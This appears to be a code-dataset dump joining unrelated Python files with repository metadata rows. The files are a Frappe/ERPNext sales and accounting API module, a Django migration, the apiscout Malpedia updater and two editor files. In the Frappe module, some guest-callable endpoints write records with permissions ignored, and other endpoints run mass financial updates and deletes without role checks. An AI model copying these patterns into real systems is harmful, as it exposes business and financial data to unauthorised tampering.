            feature += """ ]}}]}"""
        else:
            feature += """ , """
    return feature

@frappe.whitelist(allow_guest=True)  # returns the route for the tables
def get_tabla(user, date):
    rutas = frappe.get_all('Ruta',
        fields=['cliente', 'nombre_prospecto', 'lat', 'lng', 'time', 'comentario'],
        filters={'usuario': user, 'date': date},
        order_by='creation'
    )
    return rutas

@frappe.whitelist(allow_guest=True)  # returns the users with the Vendedor Role Profile to start capture in the app
def get_usuarios():
    # u = frappe.db.sql("SELECT name from tabUser")
    # return u
    usuarios = frappe.get_all('User',
        fields=['name', 'full_name'],
        filters={'role_profile_name': 'Vendedor'},
        order_by='name'
    )
    if usuarios:
        return usuarios
    else:
        return('No encontrado')

@frappe.whitelist(allow_guest=True)
def generar_lead(owner, lead_name, email_id, numero, lead_owner, source, campaign_name, informacion_adicional, lead_type):
    doc = frappe.get_doc({
        "doctype": "Lead",
        "user": "Administrator",
        "owner": owner,
        "lead_name": lead_name,
        "email_id": email_id,
        "numero": numero,
        "lead_owner": lead_owner,
        "source": source,
        "campaign_name": campaign_name,
        "informacion_adicional": informacion_adicional,
        "lead_type": lead_type
    })
    doc.insert(ignore_permissions=True)
    frappe.db.commit()
    # return('Nuevo Lead: ' + str(doc.name))
    # frappe.db.sql("UPDATE tabLead SET status='Asignado' WHERE source like '%Publicidad%'")
    # frappe.db.commit()
    frappe.sendmail(['egarcia@totall.mx', "{0}".format(doc.lead_owner)], \
        subject=doc.name, \
        content="Felicidades usted tiene un nuevo prospecto, de click en la liga para darle seguimiento. ¡Exito! " + frappe.utils.get_url_to_form(doc.doctype, doc.name), delayed=False)

@frappe.whitelist(allow_guest=True)
def recorrido(user, lat, lng):
    frappe.log_error(title="Error latitud", message=lat + user)
    doc = frappe.get_doc({
        "doctype": "Recorrido",
        "user": user.strip('"'),
        "lng": lng,
        "lat": lat,
        "phone": user
    })
    doc.insert(ignore_permissions=True)
    frappe.db.commit()
    return('Nueva-Lectura Insertada: ' + str(doc.name))

@frappe.whitelist(allow_guest=True)  # loads the registered stations and builds the file for the map
def get_estaciones():
    estaciones = frappe.get_all('Estacion', fields=['nombre', 'lat', 'lng'])
    feature = """ { "type": "FeatureCollection" , "features":[ """
    for i in estaciones:
        feature += """ { "type" : "Feature","properties":{"name": " """ + i.nombre + """ "},"geometry":{"type":"Point","coordinates":[""" + str(i.lat) + """,""" + str(i.lng) + """]}}"""
        if i == estaciones[-1]:
            feature += """ ]} """
        else:
            feature += """ , """
    return feature

@frappe.whitelist(allow_guest=True)
def estaciones(estacion, lat, lng):
    est = frappe.db.get_value("Estacion", estacion, "name")
    if est:
        frappe.db.sql("UPDATE tabEstacion SET lat=%s , lng= %s WHERE nombre = %s", (lat, lng, estacion))
        frappe.db.commit()
        return ('Estacion Actualizada.')
    else:
        return('no se encontro la estacion')
    # est = frappe.db.get_value("Estacion", estacion, "name")
    # if est:
    #     frappe.db.set_value("Estacion", estacion, 'lat', lat)
    #     frappe.db.set_value("Estacion", estacion, 'lng', lng)
    #     return ('Estacion Actualizada.')
    # else:
    #     return('no se encontro la estacion')

# RG - Update actual quantity on Item
# still need a method so every Item has stock_maximo; get_all stock_maximo < 0 (change it to int)
# another option - build the method from Bin and compute the reorder point from there (maybe easier)
# RG - In hooks -> events this method is registered for "Bin": "on_update": "totall.api.update_actual"
# RG - What it does is update the reorder point (actual - stock maximo) so it shows in the Max report of the Item Doctype
@frappe.whitelist()
def update_actual(self, method):
    # m = str(self.name) + "item: " + str(self.item_code)
    # frappe.log_error(title="New Update Actual Qty", message=m)
    doc = frappe.get_doc("Item", self.item_code)
    if self.warehouse == 'GENERAL - SAT':
        doc.actual = self.actual_qty
        doc.reorder = float(self.actual_qty) - float(self.stock_maximo)
        doc.save()
        frappe.errprint('Items actualizado')

# RG - In hooks -> events this method is registered for "Item": "on_update": "totall.api.update_actual"
# RG - What it does is update the reorder point (actual - stock maximo) so it shows in the Max report of the Item Doctype
@frappe.whitelist()
def update_actual_item(self, method):
    # doc = frappe.get_doc("Item", self.name)
    frappe.errprint('asas')
    reorder = float(self.actual) - float(self.stock_maximo)
    frappe.db.sql("UPDATE tabItem set reorder=%s WHERE name = %s", (str(reorder), self.name))
    # self.save()
    # frappe.msgprint('El articulo ha sido actualizado.')

# RG - This is a method we ran manually to update the Actual and Reorder quantities on the Item (considering the maximum stock)
# RG - ToDo - put a similar method in hooks > Events > Item > on_update so it recalculates
@frappe.whitelist()
def actual():
    # doc = frappe.get_doc("Item", 'GUM78-ARE')
    # doc.save()
    items = frappe.get_all('Bin', filters={'warehouse': 'GENERAL - SAT'}, fields=['name', 'actual_qty', 'item_code'])
    for i in items:
        if 0 < i.actual_qty < 100:
            doc = frappe.get_doc("Item", i.item_code)
            doc.actual = i.actual_qty
            doc.reorder = float(i.actual_qty) - float(doc.stock_maximo)
            doc.save()
            frappe.errprint(i.item_code + 'actual: ' + str(i.actual_qty) + ' max: ' + str(doc.stock_maximo))

@frappe.whitelist()
def actualizar():
    # to update all items, run the queries from the console
    # items = frappe.get_all('Bin', filters={'actual_qty': '0'}, fields=['item_code'])
    items = frappe.db.sql("SELECT name from tabItem WHERE actual IS NULL")
    for i in items:
        item = frappe.db.sql("SELECT actual from tabItem WHERE name = %s", i)
        #item = frappe.db.sql("UPDATE tabItem set actual=0 WHERE name = %s", i)
        frappe.errprint(item)
    #r = frappe.get_doc("Item", items[1]['item_code'])
    #frappe.errprint(items)
    # set ALL items that have null to 0 - you can frappe.db.sql('UPDATE')
    # update item.reorder float(i.actual) - float(doc.stock_maximo) for all Items.actual === 0

@frappe.whitelist()
def borrar():
    return frappe.db.sql("DELETE from `tabBin` where warehouse != 'GENERAL - SAT' and actual_qty = 0")

@frappe.whitelist()
def atrasado():
    frappe.db.sql("UPDATE `tabSales Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
    frappe.db.sql("UPDATE `tabPurchase Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
    frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = DATEDIFF(CURDATE(), a.posting_date), b.factura = a.name where a.status = 'Overdue' or a.status = 'Unpaid'")
    frappe.db.sql("UPDATE `tabCustomer` set congelado = 1, credit_limit = 1 where atrasado >= 40 and clave like '%%CC%%'")
    frappe.db.sql("UPDATE `tabCustomer` set congelado = 0, credit_limit = 0 where atrasado < 40 and clave like '%%CC%%'")
    frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = 0 where a.customer not in (Select customer from `tabSales Invoice` where status = 'Overdue' or status = 'Unpaid')")
    frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'customer' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabCustomer` b on max_creation.party = b.customer_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")
    frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'supplier' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabSupplier` b on max_creation.party = b.supplier_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")

@frappe.whitelist()
def factura_global():
    frappe.db.sql("UPDATE `tabCFDI` set grand_total = total")

@frappe.whitelist()
def sin_timbrar():
    frappe.db.sql("UPDATE `tabSales Invoice` set sin_timbrar = DATEDIFF(CURDATE(), creation) where cfdi_status='Sin Timbrar'")

@frappe.whitelist()
def nuevas_facturas():
    anteriores = frappe.db.sql("""SELECT name,creation,date_sub(NOW(),INTERVAL 5 HOUR),TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) FROM `tabSales Invoice` WHERE docstatus = %s AND TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) > 24""", (0), as_dict=1)
    for a in anteriores:
        frappe.db.sql("""UPDATE `tabSales Invoice` SET docstatus = 2, observaciones ='Factura cancelada por tiempo de espera excedido' WHERE name =%s""", (a.name), as_dict=1)

@frappe.whitelist()
def genera_cotizacion(name='PUR-SQTN-2021-00001'):
    si = frappe.get_doc('Supplier Quotation', name)
    articulosproveedor = si.items
    articulosventa = {}
    margen = si.margen
    #return frappe.errprint(margen)
    doc = frappe.new_doc('Quotation')
    articulosventa = doc.items
    for a in articulosproveedor:
        a.item_code
        a.amount = a.amount*margen
        a.valuation_rate = a.rate
        for b in articulosventa:
            b.item_code = a.item_code
            b.amount = a.amount*margen
    doc.save()
    frappe.msgprint('Cotizacion Generada')
    # doc.append("items", {
    #     "item_code": si.items[0].item_code,
    #     "qty": 1,
    #     "precio_de_venta": si.monto / 1.16,
    #     "monto": si.monto / 1.16,
    #     "precio_unitario_neto": si.monto / 1.16,
    #     "precio_neto": si.monto / 1.16,
    #     "tax": 16,
    #     "impuestos_totales": (si.monto / 1.16) * 0.16
    # })
    #
    # doc.append("si_sustitucion", {
    #     "tipo_documento": "Sales Invoice",
    #     "sales_invoice": si.name,
    #     "uuid": si.uuid,
    #     "valor": si.monto
    # })
    #
    #

@frappe.whitelist()
def boton(name):
    pos = frappe.get_doc('POS Invoice', name)
    doc = frappe.new_doc('Sales Invoice')
    doc.items = pos.items
    doc.customer = pos.customer
    doc.perfil_facturacion = 'TICKET'
    doc.is_pos = 1
    doc.update_stock = 1
    doc.naming_series = 'TICKET'
    doc.append("payments", {
        "mode_of_payment": 'Efectivo',
        "account": '101.01 - Caja y efectivo - SAT',
        "amount": pos.grand_total,
        "type": 'Cash',
        "base_amount": pos.base_grand_total
    })
    doc.save()
    doc.submit()
    frappe.errprint(doc.name)

@frappe.whitelist()
def update_payment_entry(name):
    doc = frappe.get_doc('Payment Entry', name)
    references = doc.references
    gran_total_original = 0
    for r in references:
        si = frappe.get_doc('Sales Invoice', r.reference_name)
        gran_total_original += round(si.monto_pendiente, 2)
        frappe.db.set_value("Payment Entry Reference", r.name, 'monto_pendiente', si.monto_pendiente)
    #frappe.db.set_value("Payment Entry", doc.name, 'total_original', gran_total_original)
    frappe.errprint(gran_total_original)

@frappe.whitelist()
def saldos_cero():
    frappe.db.sql("""update `tabGL Entry` a LEFT JOIN `tabPayment Entry` b ON a.voucher_no = b.name SET a.credit_in_account_currency = 0 , a.credit = 0 where b.unallocated_amount = a.credit_in_account_currency AND b.unallocated_amount = a.credit AND b.unallocated_amount > 0 AND b.docstatus = 1""")
    frappe.db.sql("""update `tabSales Invoice` SET outstanding_amount = 0 WHERE outstanding_amount < 0""")

@frappe.whitelist()
def crear_pago(name):
    doc = frappe.get_doc('CFDI Nota de Credito', name)
    cliente = frappe.get_doc('Customer', doc.customer)
    today = date.today()
    frappe.errprint(doc.name)
    frappe.errprint(doc.conversion_rate)
    pii = frappe.new_doc("Payment Entry")
    pii.mode_of_payment = 'Transferencia bancaria'
    # pii.payment_type = 'Pay'
    pii.party_type = 'Customer'
    pii.party = doc.customer
    pii.posting_date = today.strftime("%Y-%m-%d")
    # Daniel Acosta: it was showing a Fiscal Year error when generating the payment entry
    # if doc.forma_de_pago != '01':
    #     pii.paid_from = company.default_cash_account
    # else:
    #     pii.paid_from = company.default_bank_account
    #pii.paid_to = company.default_receivable_account
    #frappe.get_value("Company",doc.company,'default_receivable_account')
    # pii.paid_to_account_currency = doc.currency
    # pii.paid_to = doc.paid_to
    pii.reference_no = doc.name
    pii.naming_series = 'NC-'
    # RG - Customers with currency != MXN can only transact in their native currency (e.g. USD)
    # RG - Customers without a default_currency, or with MXN, can transact in any currency
    # RG - Payment entries derived from the automatic discounts can NOT be stamped.
    pii.paid_amount = float(doc.total) * float(doc.conversion_rate)
    pii.source_exchange_rate = 1
    pii.target_exchange_rate = 1
    pii.received_amount = float(doc.total) * float(doc.conversion_rate)
    company = frappe.get_doc('Company', pii.company)
    pii.paid_to = '102.01 - Bancos nacionales - ' + company.abbr
    # frappe.errprint(float(doc.total) * float(doc.conversion_rate))
    for i in doc.si_sustitucion:
        pii.append('references', {
            'reference_doctype': 'Sales Invoice',
            'reference_name': i.sales_invoice,
            'allocated_amount': float(i.valor) * float(doc.conversion_rate),
            'pagado': float(i.valor) * float(doc.conversion_rate),  # change made by Santiago
        })
    pii.flags.ignore_permissions = True
    pii.flags.ignore_mandatory = True
    frappe.errprint(pii.party)
    frappe.errprint(pii.paid_to)
    # pii.flags.ignore_validate = True
    pii.submit()
    frappe.db.set_value("CFDI Nota de Credito", name, 'pago', pii.name)
    doc.pago = pii.name
    frappe.msgprint('Devolucion monetaria generada : ' + '<a href="#Form/Payment Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>')
    doc.reload()

@frappe.whitelist()
def create_stock_entry(name):
    doc = frappe.get_doc('CFDI Nota de Credito', name)
    if doc.tipo_de_factura == "Devolucion":
        pii = frappe.new_doc("Stock Entry")
        pii.stock_entry_type = "Material Receipt"
        pii.naming_series = "STE-"
        for i in doc.items:
            pii.append('items', {
                'item_code': i.item_code,
                'qty': i.qty,
                'uom': i.stock_uom,
                't_warehouse': i.warehouse,
            })
        pii.flags.ignore_permissions = True
        pii.submit()
        frappe.msgprint('Devolucion de Inventario generada : ' + '<a href="#Form/Stock Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>')
    frappe.errprint('HECHO')

# RG - Create payment
@frappe.whitelist()
def cancelar_pago(name):
    doc = frappe.get_doc('CFDI Nota de Credito', name)
    pii = frappe.get_doc('Payment Entry', doc.pago)
    pii.cancel()

@frappe.whitelist()
def quitar_tags_item_description():
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""")
    frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div><p>',''))""")
    frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p><p>',' '))""")
    frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<br>',''))""")
    frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p><p>',' '))""")
    frappe.errprint('Tags Eliminados')

@frappe.whitelist()
def quitar_tags_item():
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</p><p>',' '))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<div><p>',' '))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<br>',' '))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'<strong>',' '))""")
    frappe.db.sql("""update `tabQuotation Item` set description = (replace(description,'</strong>',' '))""")
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""")

@frappe.whitelist()
def quitar_tags():
    frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
    frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p></div>',''))""")
    frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</p><p>',' '))""")
    frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'<strong>',' '))""")
    frappe.db.sql("""update `tabPurchase Order Item` set description = (replace(description,'</strong><strong>',' '))""")

@frappe.whitelist()
def get_chart_data():
    query = """SELECT str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `posting_date`, sum(`tabSales Invoice`.`base_grand_total`) AS `sum` FROM `tabSales Invoice` WHERE (`tabSales Invoice`.`docstatus` = 1 AND `tabSales Invoice`.`metodo_pago` = 'PPD' AND DATE(`tabSales Invoice`.`posting_date`) >= '2021-04-01') GROUP BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ORDER BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC """
    data = frappe.db.sql(query, as_list=1)
    datasets = []
    labels = []
    for d in data:
        labels.append(d[0])
        datasets.append(d[1])
    query2 = """SELECT str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `creation`, sum(`tabPayment Entry`.`paid_amount`) AS `sum` FROM `tabPayment Entry` WHERE `tabPayment Entry`.`docstatus` = 1 AND `tabPayment Entry`.`payment_type` = 'Receive' GROUP BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ORDER BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC """
    data2 = frappe.db.sql(query2, as_list=1)
    datapoints = []
    labels2 = []
    for d in data2:
        labels2.append(d[0])
        datapoints.append(d[1])
    return {
        "labels": labels,
        "datasets": [{
            "name": _("Ventas a Credito"),
            "values": datasets,
            "chartType": 'bar'
        }, {
            "name": _("Pagos"),
            "values": datapoints,
            "chartType": 'line'
        }],
        "type": "axis-mixed"
    }

@frappe.whitelist()
def pi_monto_pendiente(name):
    pi = frappe.get_doc('Purchase Invoice', name)
    frappe.db.set_value("Purchase Invoice", name, 'monto_pendiente', pi.grand_total)

@frappe.whitelist()
def pago_proveedor_usd(name):
    pe = frappe.get_doc('Payment Entry', name)
    if pe.company == 'Sillas and Chairs':
        per = frappe.get_list('Payment Entry Reference', filters={'parent': pe.name})
        for r in per:
            frappe.db.set_value("Purchase Invoice", r, 'monto_pendiente', pe.paid_amount)

@frappe.whitelist()
def restore_monto_pendiente(name):
    doc = frappe.get_doc('Payment Entry', name)
    for i in doc.references:
        frappe.db.set_value('Sales Invoice', i.reference_name, 'monto_pendiente', i.monto_pendiente)
        frappe.errprint(i.reference_name)
        frappe.errprint(i.monto_pendiente)

@frappe.whitelist()
def clave(name):
    numero = frappe.db.sql("""SELECT max(clave) + 1 as "clave" from `tabCustomer` ORDER BY creation desc """)
    c = frappe.get_doc('Customer', name)
    if c.clave is None:
        frappe.db.set_value("Customer", c.name, 'clave', numero)
    # frappe.db.sql("""UPDATE `tabCustomer` set cuenta_sat = CONCAT('110410', clave) WHERE cuenta_sat IS null """)
44.718133
510
0.681829
3,425
24,908
4.845255
0.15854
0.039048
0.037782
0.050196
0.445134
0.408677
0.353299
0.333896
0.315637
0.297077
0
0.010188
0.152762
24,908
556
511
44.798561
0.776146
0.220853
0
0.217507
0
0.068966
0.464258
0.093619
0
0
0
0.001799
0
1
0.092838
false
0
0.02122
0.007958
0.137931
0.055703
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821531d61984ff76dac0b4c73fab4063e3a37fe0
3,008
py
Python
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
1
2015-07-13T03:29:04.000Z
2015-07-13T03:29:04.000Z
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
2
2015-03-03T23:02:19.000Z
2019-03-30T04:45:51.000Z
flicks/videos/migrations/0014_auto__del_field_video_user.py
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
bf6a382913901ad193d907f022086931df0de8c4
[ "BSD-3-Clause" ]
2
2016-04-15T11:43:05.000Z
2016-04-15T11:43:15.000Z
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models

class Migration(SchemaMigration):

    def forwards(self, orm):
        # Deleting field 'Video.user'
        db.delete_column('videos_video', 'user_id')

    def backwards(self, orm):
        # User chose to not deal with backwards NULL issues for 'Video.user'
        raise RuntimeError("Cannot reverse this migration. 'Video.user' and its values cannot be restored.")

    models = {
        'videos.award': {
            'Meta': {'object_name': 'Award'},
            'award_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'category': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'preview': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['videos.Video']", 'null': 'True', 'blank': 'True'})
        },
        'videos.video': {
            'Meta': {'object_name': 'Video'},
            'bitly_link_db': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
            'category': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 28, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'judge_mark': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'region': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'shortlink': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
            'state': ('django.db.models.fields.CharField', [], {'default': "'unsent'", 'max_length': '10'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'upload_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200'}),
            'user_country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'user_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}),
            'views': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
            'votes': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
        }
    }

    complete_apps = ['videos']
61.387755
163
0.566489
323
3,008
5.176471
0.325077
0.110048
0.184211
0.263158
0.44677
0.428828
0.385766
0.311603
0.238636
0.117823
0
0.019494
0.198471
3,008
49
164
61.387755
0.673994
0.038564
0
0.05
0
0
0.534441
0.271028
0
0
0
0
0
1
0.05
false
0
0.1
0
0.225
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8215508f627bf3d1b4d448dabf1e8742f974b661
2,701
py
Python
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
169
2017-04-10T14:43:54.000Z
2022-03-20T09:35:26.000Z
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
25
2017-05-19T08:53:58.000Z
2021-07-31T14:09:37.000Z
update.py
cccs-rs/apiscout
27aa5cb6991a39df03695576b351a815146fd270
[ "BSD-2-Clause" ]
44
2017-04-10T16:22:55.000Z
2021-11-09T13:45:08.000Z
import re
import os
import sys

import requests

try:
    import config
except:
    print("create a config.py based on template.config.py and set your Malpedia API token!")
    sys.exit()

def delete_existing_dbs():
    """ delete potentially existing old apivector db files """
    for filename in os.listdir("dbs"):
        if re.search(r"\d{4}-\d\d-\d\d-apivectors-v\d+\.csv", filename):
            os.remove("dbs" + os.sep + filename)

def get_newest_db_version():
    """ find ApiVector DB files and return newest version number found """
    max_version = 0
    for filename in os.listdir("dbs"):
        version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", filename)
        if version:
            max_version = max(max_version, int(version.group("version_number")))
    return max_version

def download_apivector_db():
    result = {
        "filename": "",
        "content": "",
        "version": 0
    }
    response = requests.get(
        'https://malpedia.caad.fkie.fraunhofer.de/api/list/apiscout/csv',
        headers={'Authorization': 'apitoken ' + config.APITOKEN},
    )
    if response.status_code == 200:
        result["filename"] = response.headers['Content-Disposition'].split("=")[1].strip()
        result["content"] = response.text
        version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", result["filename"])
        result["version"] = version
    else:
        print("Failed to download ApiVector DB, response code: ", response.status_code)
    return result

def check_malpedia_version():
    remote_version = 0
    response = requests.get(
        'https://malpedia.caad.fkie.fraunhofer.de/api/get/version'
    )
    if response.status_code == 200:
        response_json = response.json()
        remote_version = response_json["version"]
    else:
        print("Failed to check Malpedia version, response code: ", response.status_code)
    return remote_version

def main():
    db_version = get_newest_db_version()
    malpedia_version = check_malpedia_version()
    if db_version < malpedia_version:
        apivector_update = download_apivector_db()
        if apivector_update["version"]:
            delete_existing_dbs()
            update_db_path = "dbs" + os.sep + apivector_update["filename"]
            with open(update_db_path, "w") as fout:
                fout.write(apivector_update["content"])
            print("Downloaded and stored ApiVector DB file: ", update_db_path)
        else:
            print("ApiVector update download failed.")
    else:
        print("Your ApiVector DB is the most recent ({})".format(malpedia_version))

if __name__ == "__main__":
    sys.exit(main())
32.939024
108
0.640874
340
2,701
4.923529
0.302941
0.010753
0.010753
0.017921
0.280765
0.224612
0.151732
0.151732
0.151732
0.151732
0
0.006217
0.225842
2,701
81
109
33.345679
0.794357
0.042207
0
0.151515
0
0.030303
0.277886
0.05752
0
0
0
0
0
1
0.075758
false
0
0.075758
0
0.19697
0.090909
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8215786d8a3f20e9ccb720b4af31a0f44f648d88
752
py
Python
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
1
2019-04-24T13:32:23.000Z
2019-04-24T13:32:23.000Z
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
null
null
null
Support/Fuego/Pythia/pythia-0.4/packages/fuego/fuego/serialization/chemkin/unpickle/mechanisms/Declaration.py
marient/PelePhysics
e6ad1839d77b194e09ab44ff850c9489652e5d81
[ "BSD-3-Clause-LBNL" ]
null
null
null
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#                               Michael A.G. Aivazis
#                        California Institute of Technology
#                        (C) 1998-2003  All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#

class Declaration:

    def __init__(self, locator):
        self.locator = locator
        return

    def __str__(self):
        if self.locator:
            return "source='%s', line=%d, column=%d" % (
                self.locator.filename, self.locator.line, self.locator.column)
        return "source=<unknown>"

# version
__id__ = "$Id$"

# End of file
22.117647
82
0.408245
60
752
4.916667
0.65
0.223729
0
0
0
0
0
0
0
0
0
0.014898
0.285904
752
33
83
22.787879
0.534451
0.509309
0
0
0
0
0.143662
0
0
0
0
0
0
1
0.2
false
0
0
0
0.6
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
82175e8b7a22ac93f4e8ed01903f37b29cf95227
1,242
py
Python
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
fate/prompt.py
Mattias1/fate
10266406336bc4c683ff5b23af32ac3447f7f054
[ "MIT" ]
null
null
null
from .mode import Mode
from .document import Document

Document.promptinput = ''


class Prompt(Mode):

    def __init__(self, document, callback=None):
        Mode.__init__(self, document, callback)
        self.inputstring = ''
        self.start(document)

    def processinput(self, document, userinput):
        if isinstance(userinput, str):
            key = userinput
            if key == 'Cancel':
                self.stop(document)
            elif key == '\n':
